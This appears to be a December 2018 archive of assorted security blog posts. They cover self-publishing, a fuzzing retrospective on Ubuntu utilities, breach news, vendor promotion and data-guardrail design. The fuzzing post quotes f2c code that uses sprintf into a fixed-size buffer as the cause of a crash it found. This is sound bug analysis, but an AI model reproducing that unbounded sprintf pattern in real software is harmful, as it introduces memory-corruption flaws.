Monthly Archives: December 2018

Notes on Self-Publishing a Book

In this post I would like to share a few thoughts on self-publishing a book, in case anyone is considering that option.

As I mentioned in my post on burnout, one of my goals was to publish a book on a subject other than cyber security. A friend from my Krav Maga school, Anna Wonsley, learned that I had published several books, and asked if we might collaborate on a book about stretching. The timing was right, so I agreed.

I published my first book with Pearson and Addison-Wesley in 2004, and my last with No Starch in 2013. Fourteen years is an eternity in the publishing world, and even in the last five years the economics and structure of book publishing have changed quite a bit.

To better understand the changes, I had dinner with one of the finest technical authors around, Michael W. Lucas. We had met before this book project began, because I had been wondering about publishing books on my own. MWL started in traditional publishing like me, but has since become a full-time author and independent publisher. He explained the pros and cons of going it alone, which I carefully considered.

By the end of 2017, Anna and I were ready to begin work on the book. I believe our first "commits" occurred in December 2017.

For this stretching book project, I knew my strengths included organization, project management, writing to express another person's message, editing, and access to a skilled lead photographer. I learned that my co-author's strengths included subject matter expertise, a willingness to be photographed for the book's many pictures, and friends who would also be willing to be photographed.

None of us was very familiar with the process of transforming a raw manuscript and photos into a finished product. When I had published with Pearson and No Starch, they took care of that process, as well as copy-editing.

Beyond turning manuscript and photos into a book, I also had to identify a publication platform. Early on we decided to self-publish using one of the many newer companies offering that service. We wanted a company that could get our book into Amazon, and possibly physical book stores as well. We did not want to try working with a traditional publisher, as we felt that we could manage most aspects of the publishing process ourselves, and augment with specialized help where needed.

After a lot of research we chose Blurb. One of the most attractive aspects of Blurb was their expert ecosystem. We decided that we would hire one of these experts to handle the interior layout process. We contacted Jennifer Linney, who happened to be local and had experience publishing books to Amazon. We met in person, discussed the project, and agreed to move forward together.

I designed the structure of the book. As a former Air Force officer, I was comfortable with the "rule of threes," and brought some recent writing experience from my abandoned PhD thesis.

I designed the book to have an introduction, the main content, and a conclusion. Within the main content, the book featured an introduction and physical assessment, three main sections, and a conclusion. The three main sections consisted of a fundamental stretching routine, an advanced stretching routine, and a performance enhancement section -- something with Indian clubs, or kettle bells, or another supplement to stretching.

Anna designed all of the stretching routines and provided the vast majority of the content. She decided to focus on three physical problem areas -- tight hips, shoulders/back, and hamstrings. We encouraged the reader to "reach three goals" -- open your hips, expand your shoulders, and touch your toes. Anna designed exercises that worked in a progression through the body, incorporating her expertise as a certified trainer and professional martial arts instructor.

Initially we tried a process whereby she would write section drafts, and I would edit them, all using Google Docs. This did not work as well as we had hoped, and we spent a lot of time stalled in virtual collaboration.

By the spring of 2018 we decided to try meeting in person on a regular basis. Anna would explain her desired content for a section, and we would take draft photographs using iPhones to serve as placeholders and to test the feasibility of real content. We made a lot more progress using these methods, although we stalled again mid-year due to schedule conflicts.

By October our text was ready enough to try taking book-ready photographs. We bought photography lights from Amazon and used my renovated basement game room as a studio. We took pictures over three sessions, with Anna and her friend Josh as subjects. I spent several days editing the photos to prepare for publication, then handed the bundled manuscript and photographs to Jennifer for a light copy-edit and layout during November.

Our goal was to have the book published before the end of the year, and we met that goal. We decided to offer two versions. The first is a "collector's edition" featuring all color photographs, available exclusively via Blurb as Reach Your Goal: Collector's Edition. The second will be available at Amazon in January, and will feature black and white photographs.

While we were able to set the price of the book directly via Blurb, we could basically only suggest a price to Ingram and hence to Amazon. Ingram is the distributor that feeds Amazon and physical book stores. I am curious to see how the book will appear in those retail locations, and how much it will cost readers. We tried to price it competitively with older stretching books of similar size. (Ours is 176 pages with over 200 photographs.)

Without revealing too much of the economic structure, I can say that it's much cheaper to sell directly from Blurb. Their cost structure allows us to price the full color edition competitively. However, one of our goals was to provide our book through Amazon, and to keep the price reasonable we had to sell the black and white edition outside of Blurb.

Overall I am very pleased with the writing process, and exceptionally happy with the book itself. The color edition is gorgeous and the black and white version is awesome too.

The only change I would have made to the writing process would have been to start the in-person collaboration from the beginning. Working together in person accelerated the transfer of ideas to paper and played to our individual strengths of Anna as subject matter expert and me as a writer.

In general, I would not recommend self-publishing if you are not a strong writer. If writing is not your forte, then I highly suggest you work with a traditional publisher, or contract with an editor. I have seen too many self-published books that read terribly. This usually happens when the author is a subject matter expert, but has trouble expressing ideas in written form.

The bottom line is that it's never been easier to make your dream of writing a book come true. There are options for everyone, and you can leverage them to create wonderful products that scale with demand and can really help your audience reach their goals!

If you want to start the new year with better flexibility and fitness, consider taking a look at our book on Blurb! When the Amazon edition is available I will update this post with a link.

Update: Here is the Amazon listing.

Cross-posted from Rejoining the Tao Blog.

Fuzzing Like It’s 1989

With 2019 a day away, let’s reflect on the past to see how we can improve. Yes, let’s take a long look back 30 years and reflect on the original fuzzing paper, An Empirical Study of the Reliability of UNIX Utilities, and its 1995 follow-up, Fuzz Revisited, by Barton P. Miller.

In this blog post, we are going to find bugs in modern versions of Ubuntu Linux using the exact same tools as described in the original fuzzing papers. You should read the original papers not only for context, but for their insight. They proved to be very prescient about the vulnerabilities and exploits that would plague code over the decade following their publication. Astute readers may notice the publication date for the original paper is 1990. Even more perceptive readers will observe the copyright date of the source code comments: 1989.

A Quick Review

For those of you who didn’t read the papers (you really should), this section provides a quick summary and some choice quotes.

The fuzz program works by generating random character streams, with options to generate only printable, control, or non-printable characters. The program uses a seed to generate reproducible results, a useful feature that modern fuzzers often lack. A set of scripts executes target programs and checks for core dumps. Program hangs are detected manually. Adapters provide random input to interactive programs (1990 paper), network services (1995 paper), and graphical X programs (1995 paper).

The 1990 paper tests four different processor architectures (i386, CVAX, Sparc, 68020) and five operating systems (4.3BSD, SunOS, AIX, Xenix, Dynix). The 1995 paper has similar platform diversity. In the first paper, 25-33% of utilities fail, depending on the platform. In the 1995 follow-on, the numbers range from 9%-33%, with GNU (on SunOS) and Linux being by far the least likely to crash.

The 1990 paper concludes that (1) programmers do not check array bounds or error codes, (2) macros make code hard to read and debug, and (3) C is very unsafe. The extremely unsafe gets function and C’s type system receive special mention. During testing, the authors discover format string vulnerabilities years before their widespread exploitation (see page 15). The paper concludes with a user survey asking about how often users fix or report bugs. Turns out reporting bugs was hard and there was little interest in fixing them.

The 1995 paper mentions open source software and includes a discussion of why it may have fewer bugs. It also contains this choice quote:

When we examined the bugs that caused the failures, a distressing phenomenon emerged: many of the bugs discovered (approximately 40%) and reported in 1990 are still present in their exact form in 1995. …

The techniques used in this study are simple and mostly automatic. It is difficult to understand why a vendor would not partake of a free and easy source of reliability improvements.

It would take another 15-20 years for fuzz testing to become standard practice at large software development shops.

I also found this statement, written in 1990, to be prescient of things to come:

Often the terseness of the C programming style is carried to extremes; form is emphasized over correct function. The ability to overflow an input buffer is also a potential security hole, as shown by the recent Internet worm.

Testing Methodology

Thankfully, after 30 years, Dr. Miller still provides the full source code, scripts, and data to reproduce his results, a practice more researchers should emulate. The scripts and fuzzing code have aged surprisingly well: the scripts work as-is, and the fuzz tool required only minor changes to compile and run.

For these tests, we used the scripts and data found in the fuzz-1995-basic repository, because it includes the most modern list of applications to test. As per the top-level README, these are the same random inputs used for the original fuzzing tests. The results presented below for modern Linux used the exact same code and data as the original papers. The only thing changed is the master command list to reflect modern Linux utilities.

Updates for 30 Years of New Software

Obviously there have been some changes in Linux software packages in the past 30 years, although quite a few tested utilities still trace their lineage back several decades. Modern versions of the same software audited in the 1995 paper were tested, where possible. Some software was no longer available and had to be replaced. The justification for each replacement is as follows:

  • cfe → cc1: This is a C preprocessor equivalent to the one used in the 1995 paper.
  • dbx → gdb: This is a debugger equivalent to the one used in the 1995 paper.
  • ditroff → groff: ditroff is no longer available.
  • dtbl → gtbl: A GNU Troff equivalent of the old dtbl utility.
  • lisp → clisp: A Common Lisp implementation.
  • more → less: Less is more!
  • prolog → swipl: There were two choices for Prolog: SWI-Prolog and GNU Prolog. SWI-Prolog won out because it is an older and more comprehensive implementation.
  • awk → gawk: The GNU version of awk.
  • cc → gcc: The default C compiler.
  • compress → gzip: GZip is the spiritual successor of the old Unix compress.
  • lint → splint: A GPL-licensed rewrite of lint.
  • /bin/mail → /usr/bin/mail: This should be an equivalent utility at a different path.
  • f77 → fort77: There were two possible choices for a Fortran 77 compiler: GNU Fortran and Fort77. GNU Fortran is recommended for Fortran 90, while Fort77 is recommended for Fortran 77 support. The underlying f2c program is actively maintained, and its changelog records entries dating back to 1989.


The fuzzing methods of 1989 still find bugs in 2018. There has, however, been progress.

Measuring progress requires a baseline, and fortunately, there is a baseline for Linux utilities. While the original fuzzing paper from 1990 predates Linux, the 1995 re-test uses the same code to fuzz Linux utilities on the 1995 Slackware 2.1.0 distribution. The relevant results appear in Table 3 of the 1995 paper (pages 7-9). GNU/Linux held up very well against commercial competitors:

The failure rate of the utilities on the freely-distributed Linux version of UNIX was second-lowest at 9%.

Let’s examine how the Linux utilities of 2018 compare to the Linux utilities of 1995 using the fuzzing tools of 1989:

                 Ubuntu 18.10   Ubuntu 18.04   Ubuntu 16.04   Ubuntu 14.04       Slackware 2.1.0
                 (2018)         (2018)         (2016)         (2014)             (1995)
Crashes          1 (f77)        1 (f77)        2 (f77, ul)    2 (swipl, f77)     4 (ul, flex, indent, gdb)
Hangs            1 (spell)      1 (spell)      1 (spell)      2 (spell, units)   1 (ctags)
Total Tested     81             81             81             81                 55
Crash/Hang %     2%             2%             4%             5%                 9%

Amazingly, the Linux crash and hang count is still not zero, even for the latest Ubuntu release. The f2c program called by f77 triggers a segmentation fault, and the spell program hangs on two of the test inputs.

What Are The Bugs?

There are few enough bugs that I could manually investigate the root cause of some issues. Some results, like a bug in glibc, were surprising, while others, like an sprintf into a fixed-size buffer, were predictable.

The ul Crash

The bug in ul is actually a bug in glibc. Specifically, it is an issue reported here and here (another person triggered it in ul) in 2016. According to the bug tracker it is still unfixed upstream. Since the issue cannot be triggered on Ubuntu 18.04 and newer, however, it appears to have been fixed at the distribution level. From the bug tracker comments, the core issue could be very serious.

The f77 Crash

The f77 program is provided by the fort77 package, which is itself a wrapper script around f2c, a Fortran 77-to-C source translator. Debugging f2c reveals that the crash is in the errstr function when printing an overly long error message. The f2c source reveals that it uses sprintf to write a variable-length string into a fixed-size buffer:

errstr(const char *s, const char *t)
{
  char buff[100];
  sprintf(buff, s, t);
  /* ... */
}

This issue looks like it has been a part of f2c since its inception. The f2c program has existed since at least 1989, per its changelog. A Fortran 77 compiler was not tested on Linux in the 1995 fuzzing re-test, but had it been, this issue would have been found earlier.

The spell Hang

This is a great example of a classic deadlock. The spell program delegates spell checking to the ispell program via a pipe. The spell program reads text line by line and issues a blocking write of the entire line to ispell. The ispell program, however, will read at most BUFSIZ/2 bytes at a time (4096 bytes on my system) and then issue a blocking write back to ensure the client has received the spelling data processed so far. Two different test inputs cause spell to write a line of more than 4096 characters to ispell, causing a deadlock: spell waits for ispell to read the whole line, while ispell waits for spell to acknowledge that it read the initial corrections.

The units Hang

Upon initial examination this appears to be an infinite loop condition. The hang looks to be in libreadline and not units, although newer versions of units do not suffer from the bug. The changelog indicates some input filtering was added, which may have inadvertently fixed this issue. While a thorough investigation of the cause and correction was out of scope for this blog post, there may still be a way to supply hanging input to libreadline.

The swipl Crash

For completeness I wanted to include the swipl crash. However, I did not investigate it thoroughly, as the crash has long been fixed and looks fairly benign. The crash is actually an assertion failure (i.e., a condition the developer believed impossible has occurred) triggered during character conversion:

[Thread 1] pl-fli.c:2495: codeToAtom: Assertion failed: chrcode >= 0
C-stack trace labeled "crash":
  [0] __assert_fail+0x41
  [1] PL_put_term+0x18e
  [2] PL_unify_text+0x1c4

It is never good when an application crashes, but at least in this case the program can tell something is amiss, and it fails early and loudly.


Fuzzing has been a simple and reliable way to find bugs in programs for the last 30 years. While fuzzing research is advancing rapidly, even the simplest attempts that reuse 30-year-old code are successful at identifying bugs in modern Linux utilities.

The original fuzzing papers do a great job at foretelling the dangers of C and the security issues it would cause for decades. They argue convincingly that C makes it too easy to write unsafe code and should be avoided if possible. More directly, the papers show that even naive fuzz testing still exposes bugs, and such testing should be incorporated as a standard software development practice. Sadly, this advice was not followed for decades.

I hope you have enjoyed this 30-year retrospective. Be on the lookout for the next installment of this series: Fuzzing In The Year 2000, which will investigate how Windows 10 applications compare against their Windows NT/2000 equivalents when faced with a Windows message fuzzer. I think that you can already guess the answer.

Evaluating Advanced Persistent Threats Mitigation Effects: A Review

Advanced Persistent Threat (APT) is a targeted attack method used by sophisticated, determined, and skilled adversaries to maintain undetected access over an extended period for the exfiltration of valuable data. APT poses a high threat level to organizations, especially government organizations. 60% of the problem is the inability to detect penetration using traditional mitigation methods. Numerous studies indicate that vulnerabilities exist in most organizations and, when exploited, will have major financial implications and damage the organization's reputation. Traditional methods for mitigating security breaches have proved ineffective. This project aims to evaluate the utilization and effectiveness of APT mitigation techniques using the existing literature, thereby providing a synopsis of APT. A method-based approach is adopted: the studies are reviewed and a comparative analysis is made of the methods used to mitigate APT. The study compares 25 papers that proposed mitigation methods, filtered from a wide range of research reports published between 2011 and 2017 to separate mitigation methods from review articles, threat-identification papers, and the like. These 25 papers were analysed to show the effectiveness of the 12 mitigation methods utilized by the researchers. 72% of the researchers employed multiple methods to mitigate APT. The major methods used are traffic/data analysis (30%), pattern recognition (21%), and anomaly detection (16%). These three methods work in line with providing effective internal audit, risk management, and corporate governance, as highlighted in COBIT 5, an IT management and governance framework from ISACA.

Hackers steal personal data from 997 North Korean defectors

Hackers just caused grief for North Korean defectors. South Korea's Unification Ministry has revealed that attackers stole the personal data of 997 defectors, including their names and addresses. The breach came after a staff member at the Hana Foundation, which helps defectors from the North settle in the South, unwittingly opened an email containing malware. The defectors' data is normally supposed to be isolated from the internet and encrypted, but the unnamed staffer didn't follow those rules, officials said.

Source: Wall Street Journal

Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality 

Virtual and augmented reality technology is changing the way we see the world.

You’ve probably heard the buzz around Virtual Reality (VR) and Augmented Reality (AR) and your child may have even put VR gear on this year’s wish list. But what’s the buzz all about and what exactly do parents need to know about these mind-bending technologies?

VR and AR technology sound a bit sci-fi and intimidating, right? They can be until you begin to understand the amazing ways these technologies are being applied to entertainment as well as other areas like education and healthcare. But, like any new technology, where there’s incredible opportunity there are also safety issues parents don’t want to ignore.

According to a report from Common Sense Media, 60 percent of parents are worried about VR’s health effects on children, while others say the technology will have significant educational benefits.

Virtual Reality

Adults and kids alike are using VR technology — headsets, software, and games — to experience the thrill of being in an immersive environment.

The Pokemon Go app uses AR technology to overlay characters on an existing environment.

According to Consumer Technology Association’s (CTA) 20th Annual Consumer Technology Ownership and Market Potential Study, there are now 7 million VR headsets in U.S. households, which equates to about six percent of homes. CTA estimates that 3.9 million VR/AR headsets shipped in 2017 and 4.9 million headsets will ship in 2018.

With VR technology, a user wears a head-mounted display (HMD) and interacts with 3D computer-generated environments, driven by a PC or smartphone, that create the illusion of actually being in that place. The headset has a separate OLED display for each eye, each showing the environment from a slightly different angle to give the perception of depth. VR environments are diverse: one might take you inside the human body to learn about the digestive system, another might be a battlefield, while another might be a serene ocean view. The list of games, apps, experiences, and movies goes on and on.

Augmented Reality

AR differs from VR in that it overlays digital information onto physical surroundings and does not require a headset. AR is transparent: it allows you to see and interact with your environment while adding digital images and data to enhance your view of the real world. AR is used in apps like Pokémon Go and in GPS and walking apps that annotate your surroundings in real time. Though not as immersive as VR, AR can still enrich physical reality and is finding its way into a number of industries. VR and AR technologies are used in education for e-learning and in the military for combat, medic, and flight-simulation training. The list of AR applications continues to grow.

To support these growing technologies, thousands of games, videos, live music performances, and events are available. VR museums and arcades exist, and theme parks are adapting thrill rides to meet the demand for VR experiences. Increasingly, retailers are hopping on board, using VR to engage customers, which will be a hot topic at the upcoming 2019 Consumer Electronics Show (CES) in Las Vegas.

Still, parents have questions, such as what effect these immersive technologies will have on children's brains, and whether VR environments blur the line between reality and fantasy enough to change a child's behavior. The answer: at this point, not a lot is known about VR's effect on children, but medical opinions are emerging that warn of potential health impacts. So, calling a family huddle on the topic is a good idea if you have these technologies in your home or plan to in the near future.

VR/AR talking points for families

Apply safety features. VR apps and games include safety features such as restricted chat and privacy settings that allow users to filter out crude language and report abusive behavior. While some VR environments have moderators in place, some do not. This is also a great time to discuss password safety and privacy with your kids.

The best way to understand VR? Jump in the fun alongside your kids.

Age ratings and reviews. Some VR apps or games contain violence so pay attention to age restrictions. Also, be sure to read the reviews of the game to determine the safety, quality, and value of the VR/AR content.

Inappropriate content. While fun, harmless games and apps exist, so too does sexual content that kids can and do seek out. Be aware of how your child is using his or her VR headset and what content they are engaged with. Always monitor your child’s tech choices.

Isolation. A big concern with VR’s immersive structure is that players can and do become isolated in a VR world and, like with any fun technology, casual can turn addictive. Time limits on VR games and monitoring are recommended.

Physical safety/health. Because games are immersive, VR players can fall or hurt themselves or others while playing. To be safe, sit down while playing, don’t play in a crowded space, and remove pets from the playing area.

In addition to physical safety, doctors have expressed VR-related health concerns. Some warn about brain and eye development in kids related to VR technology. Because of the brain-eye connection of VR, players are warned about dizziness, nausea, and anxiety related to prolonged play in a VR environment.

Doctors recommend adult supervision at all times and keeping VR sessions short to give the eyes, brain, and emotions a rest. The younger the child, the shorter the exposure should be.

Be a good VR citizen. Being a good digital citizen extends to the VR world. When playing multi-player VR games, be respectful, kind, and remember there are real hearts behind those avatars. Also, be mindful of the image your own avatar is communicating. Be aware of bullies and bullying behavior in a virtual world where the lines between reality and fantasy can get blurred.

Get in the game. If you allow your kids to play VR games, get immersed in the game with them. Understand the environments, the community, the feeling of the game, and the safety risks first hand. A good rule: If you don’t want your child to experience something in the real world — violence, cursing, fear, anxiety — don’t let them experience it in a virtual world.

To get an insider’s view of what a VR environment is like and to learn more about potential security risks, check out McAfee’s podcast Hackable?, episode #18, Virtually Vulnerable.

The post Mind-Bending Tech: What Parents Need to Know About Virtual & Augmented Reality  appeared first on McAfee Blogs.

Hackers defeat vein authentication by making a fake hand

Biometric security has moved beyond just fingerprints and face recognition to vein-based authentication. Unfortunately, hackers have already figured out a way to crack that, too. According to Motherboard, security researchers at the Chaos Communication Congress hacking conference in Leipzig, Germany, showed how they used a wax model hand to defeat a vein authentication system.

Source: Motherboard

McAfee 2018: Year in Review

2018 was an eventful year for all of us at McAfee. It was full of discovery, innovation, and progress—and we’re thrilled to have seen it all come to fruition. Before we look ahead to what’s in the pipeline for 2019, let’s take a look back at all the progress we’ve made this year and see how McAfee events, discoveries, and product announcements have affected, educated, and assisted users and enterprises everywhere.

MPOWERing Security Professionals Around the World

Every year, security experts gather at MPOWER Cybersecurity Summit to strategize, network, and learn about innovative ways to ward off advanced cyberattacks. This year was no different, as innovation was everywhere at MPOWER Americas, APAC, Japan, and EMEA. At the Americas event, we hosted Partner Summit, where head of channel sales and operations for the Americas, Ken McCray, discussed the program, products, and corporate strategy. Partners had the opportunity to dig deeper into this information through several Q&A sessions throughout the day. MPOWER Americas also featured groundbreaking announcements, including McAfee CEO Chris Young’s announcement of the latest additions to the MVISION product family: MVISION® Endpoint Detection and Response (MVISION EDR) and MVISION® Cloud.

ATR Analysis

This year was a prolific one, especially for our Advanced Threat Research team, which unveiled discovery after discovery about the threat landscape, from ‘Operation Oceansalt’ delivering five distinct waves of attacks on victims, to Triton malware spearheading the latest attacks on industrial systems, to GandCrab ransomware evolving rapidly, to the Cortana vulnerability. These discoveries not only taught us about cybercriminal techniques and intentions, but they also helped us prepare ourselves for potential threats in 2019.

Progress via Products

2018 wouldn’t be complete without a plethora of product updates and announcements, all designed to help organizations secure crucial data. This year, we were proud to announce McAfee MVISION®, a collection of products designed to support native security controls and third-party technologies.

McAfee MVISION® Endpoint orchestrates the native security controls in Windows 10 with targeted advanced threat defenses in a unified management workflow to visualize and investigate threats, understand compliance, and pivot to action. McAfee MVISION®  Mobile protects against threats on Android and iOS devices. McAfee MVISION® ePO, a SaaS service, is designed to eliminate complexity by elevating management above the specific threat defense technologies with simple, intuitive workflows for security threat and compliance control across devices.

Beyond that, many McAfee products were updated to help security teams everywhere adapt to the ever-evolving threat landscape, and some even took home awards for their excellence.

All in all, 2018 was a great year. But, as always with cybersecurity, there’s still work to do, and we’re excited to work together to create a secure 2019 for everyone.

To learn more about McAfee, be sure to follow us at @McAfee and @McAfee_Business.


Chinese Hackers Pose a Serious Threat to Military Contractors

Chinese hackers have successfully breached contractors for the U.S. Navy, according to a WSJ report.

The years-long Marriott Starwood database breach was almost certainly the work of nation-state hackers sponsored by China, likely as part of a larger campaign by Chinese hackers to breach health insurers and government security clearance files, The New York Times reports. Why would foreign spies be so interested in the contents of a hotel’s guest database? Turns out “Marriott is the top hotel provider for American government and military personnel.” The Starwood database contained a treasure trove of highly detailed information about these personnel’s movements around the world.

Chinese hackers didn’t stop there. According to a report published in the Wall Street Journal last week, nation-state hackers sponsored by China have successfully breached numerous third-party contractors working for the U.S. Navy on multiple occasions over the past 18 months. The data stolen included highly classified information about advanced military technology currently under development, including “secret plans to build a supersonic anti-ship missile planned for use by American submarines.” The WSJ noted that hackers specifically targeted third-party federal contractors because many are small firms that lack the financial resources to invest in robust cyber security defenses.

In testimony Wednesday before a Senate Judiciary Committee hearing, FBI counterintelligence division head E.W. “Bill” Priestap called cyberespionage on the part of Chinese hackers the “most severe” threat to American security, citing the country’s “relentless theft of U.S. assets” in an effort to “supplant [the United States] as the world’s superpower.”

Inconsistent security practices leave U.S. Ballistic Missile Defense System vulnerable to cyber attacks

While the Navy has been hit particularly hard, the entire U.S. government, including all branches of the military, is under constant threat of cyber attack from Chinese hackers and other nation-state actors – and it is ill-prepared to fend off these attacks. Around the same time the Marriott Starwood breach was disclosed, the Defense Department Office of Inspector General (OIG) released an audit report citing inconsistent security practices at DoD facilities, including facilities managed by third-party contractors, that store technical information on the nation’s ballistic missile defense system (BMDS). The report described failures to enact basic security measures, such as:

  • Requiring the use of multifactor authentication to access BMDS technical information
  • Identifying and mitigating known network vulnerabilities
  • Locking server racks
  • Protecting and monitoring classified data stored on removable media
  • Encrypting BMDS technical information during transmission
  • Implementing intrusion detection capabilities on classified networks
  • Requiring written justification to obtain and elevate system access for users
  • Consistently implementing physical security controls to limit unauthorized access to facilities that manage BMDS technical information

Cyber security problems abound among DoD and other federal contractors

The OIG report comes on the heels of another report the office issued earlier this year, citing security problems specifically at contractor-run military facilities. The WSJ report on Chinese hackers implied that inadequate security is the norm, not the exception, at federal contractors and subcontractors, citing an intelligence official who described military subcontractors as “lagging behind in cybersecurity and frequently [suffering] breaches” that impact not just the military branch they work for, but also other branches.

In theory, military contractors shouldn’t be having these problems. Most federal contractors must comply with the strict security controls outlined in NIST 800-171, and DoD contractors must comply with DFARS 800-171. DoD contractors were required to, at minimum, have a “system security plan” in place by December 31, 2017. Many small and mid-sized organizations missed that deadline, often because they felt they did not have the resources to comply. However, continued non-compliance puts these vendors’ contracts at risk of cancellation, and national security at risk from Chinese hackers and other cyber criminals.

It’s not too late to begin compliance efforts. If your agency starts working towards compliance now, you can demonstrate to your prime contractor, subcontractor, or DoD contracting officer that you have a plan to comply and are making progress with it.

Affordable DFARS 800-171 compliance services are available for small and mid-sized federal contractors

Continuum GRC’s IT Audit Machine (ITAM) greatly simplifies the compliance process and significantly cuts the time and costs involved, putting NIST 800-171 and DFARS 800-171 compliance within reach of small and mid-sized organizations. Additionally, Continuum GRC has partnered with Gallagher Affinity to offer small and mid-sized federal contractors affordable packages that combine cyber and data breach insurance coverage with NIST 800-171 and DFARS 800-171 compliance services.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.


Quick Wins with Data Guardrails and Behavioral Analytics

Posted under: Research and Analysis

This is the third (and final) post in our series on Protecting What Matters: Introducing Data Guardrails and Behavioral Analytics. In our first post, Introducing Data Guardrails and Behavioral Analytics: Understand the Mission, we introduced the concepts and outlined the major categories of insider risk. In the second post we delved into and defined the terms. As we wrap up the series, we’ll bring it together via a scenario showing how these concepts would work in practice.

As we wrap up the Data Guardrails and Behavioral Analytics series, let’s go through a quick scenario to provide a perspective on how these concepts apply to a simplistic example. Our example company is a small pharmaceutical company. As with all pharma companies, much of their value lies in intellectual property, which makes that the most significant target for attackers. Thanks to fast growth and a highly competitive market, the business isn’t waiting for perfect infrastructure and controls before launching products and forming partnerships. As a new company without legacy infrastructure (or mindset), they have built the majority of their infrastructure in the cloud and take a cloud-first approach.

In fact, the CEO has been recognized for their innovative use of cloud-based analytics to accelerate the process of identifying new drugs. As excited as the CEO is about these new computing models, the board is very concerned about both external attacks and insider threats as their proprietary data resides in dozens of service providers. So, the security team feels pressure to do something to address the issue.

The CISO is very experienced, but is still coming to grips with the changes in mindset, controls, and operational motions inherent to a cloud-first approach. Defaulting to the standard data security playbook represents the path of least resistance, but she’s savvy enough to know that would create significant gaps in both visibility and control of the company’s critical intellectual property. The approach of using Data Guardrails and Data Behavioral Analytics presents an opportunity to both define a hard set of policies for data usage and protection and watch for anomalous behaviors potentially indicating malicious intent. So let’s see how she would lead her organization through a process to define Data Guardrails and Behavioral Analytics.

Finding the Data

As we mentioned in the previous post, what’s unique about data guardrails and behavioral analytics is combining content knowledge (classification) with context and usage. Thus, the first step we’ll take is classifying the sensitive data within the enterprise.

This involves undertaking an internal discovery of data resources. The technology to do this is mature and well understood, although they need to ensure discovery extends to cloud-based resources. Additionally, they need to talk to the senior leaders of the business to make sure they understand how business strategy impacts application architecture and therefore the location of sensitive data.
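To make that concrete, here is a toy sketch of pattern-based classification during discovery. The patterns and labels below are hypothetical, made up for illustration; real discovery tools use far richer content inspection than a few regexes.

```python
import re

# Hypothetical classification rules: regex pattern -> sensitivity label.
RULES = [
    (re.compile(r"\btrial[- ]id:\s*\d+", re.I), "clinical-trial"),
    (re.compile(r"\bcompound[- ]\d{4}\b", re.I), "research"),
    (re.compile(r"\b\d{3}-\d{2}-\d{4}\b"), "pii"),  # SSN-like pattern
]

def classify(text: str) -> set:
    """Return the set of sensitivity labels whose patterns match the text."""
    return {label for pattern, label in RULES if pattern.search(text)}
```

Running `classify("Participant SSN 123-45-6789, trial-id: 42")` would tag the document with both "pii" and "clinical-trial", and those tags are what the later guardrail and analytics stages key off of.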

Internal private research data and clinical trials make up most of the company’s intellectual property. This data can be both structured and unstructured, complicating the discovery process. This is somewhat eased as the organization has embraced cloud storage to centralize the unstructured data and embraced SaaS wherever possible for front office functions. A lot of the emerging analytics use cases remain a challenge to protect, given the relatively immature operational processes in their cloud environments.

As with everything else in security, visibility comes before control, and this discovery and classification process needs to be the first thing done to get the data security process moving. To be clear, having a lot of the data in a cloud service addressable via an API doesn’t by itself keep the classification current. This remains one of the bigger challenges to data security, and as such it requires specific activities (and the associated resources) to keep the classification up to date as the process rolls into production.

Defining Data Guardrails

As we’ve mentioned previously, guardrails are rule sets that keep users within the lines of authorized activity. Thus, the CISO starts by defining the authorized actions and then enforcing those policies where the data resides. For simplicity’s sake, we’ll break the guardrails into three main categories:

  • Access: These guardrails have to do with enforcing access to the data. For instance, files relating to recruiting participants in a clinical trial need to be heavily restricted to the group tasked with recruitment. If someone were to open up access to a broader group, or perhaps tag the folder as public, the guardrail would remove that access and restrict it to the proper group.
  • Action: She will also want to define guardrails on who can do what with the data. It’s important to prevent someone from deleting data or copying it out of the analytics application, so these guardrails ensure the integrity of the data by preventing misuse, whether intentional/malicious or accidental.
  • Operational: The final category of guardrails controls the operational integrity and resilience of the data. Enterprising data scientists can load up new analytics environments quickly and easily, but may not take the necessary precautions to ensure data backups or required logging/monitoring happen. Guardrails to implement automatic backups and monitoring can be set up as part of every new analytics environment.
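A guardrail is ultimately just a rule evaluated against a data-access event, with an automatic remediation when the rule fires. Here is a minimal sketch of the three categories above; the event fields and remediation names are hypothetical, purely for illustration, not any product's actual policy language.

```python
# Minimal guardrail engine sketch. Each guardrail inspects an event
# describing a data action and returns a remediation, or None if allowed.

def access_guardrail(event):
    # Access: clinical-trial recruiting files must never be made public.
    if event["folder"] == "trial-recruiting" and event.get("visibility") == "public":
        return "revoke-public-access"

def action_guardrail(event):
    # Action: block deletion or bulk copy out of the analytics application.
    if event["action"] in ("delete", "bulk-export"):
        return "block-action"

def operational_guardrail(event):
    # Operational: new analytics environments must have backups enabled.
    if event["action"] == "create-environment" and not event.get("backup"):
        return "enable-backup"

GUARDRAILS = [access_guardrail, action_guardrail, operational_guardrail]

def evaluate(event):
    """Return the list of remediations triggered by an event."""
    return [r for g in GUARDRAILS if (r := g(event))]
```

For example, an event that tags the recruiting folder as public would trigger "revoke-public-access", restoring the restricted state automatically rather than just raising an alert.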

The key in designing guardrails is to think of them as enablers, not blockers. The effectiveness of exception handling typically is the difference between a success and failure in implementing guardrails. To illuminate this, let’s consider a joint venture the organization has with a smaller biotech company. A guardrail exists to restrict access to the data related to this product to a group of 10 internal researchers. Yet clearly researchers from the joint venture partner need access as well, so you’ll need to expand the access rules of the guardrail. But you also may want to enforce multi-factor authentication on those external users or possibly implement a location guardrail to restrict external access to only IP addresses within the partner’s network.
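That joint-venture exception can itself be encoded as a rule rather than handled ad hoc: external partner accounts are allowed, but only with multi-factor authentication and only from the partner's network. A sketch of that check, where the partner network range and user fields are made up for illustration:

```python
import ipaddress

# Hypothetical partner network range for the joint venture.
PARTNER_NET = ipaddress.ip_network("203.0.113.0/24")

def allow_external_access(user, source_ip):
    """External users get access only with MFA, from the partner's network."""
    if not user.get("external"):
        return True  # internal researchers follow the normal access guardrail
    return user.get("mfa_passed", False) and \
        ipaddress.ip_address(source_ip) in PARTNER_NET
```

The point of expressing the exception this way is that it stays enforceable and auditable, instead of becoming a one-off hole punched in the guardrail.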

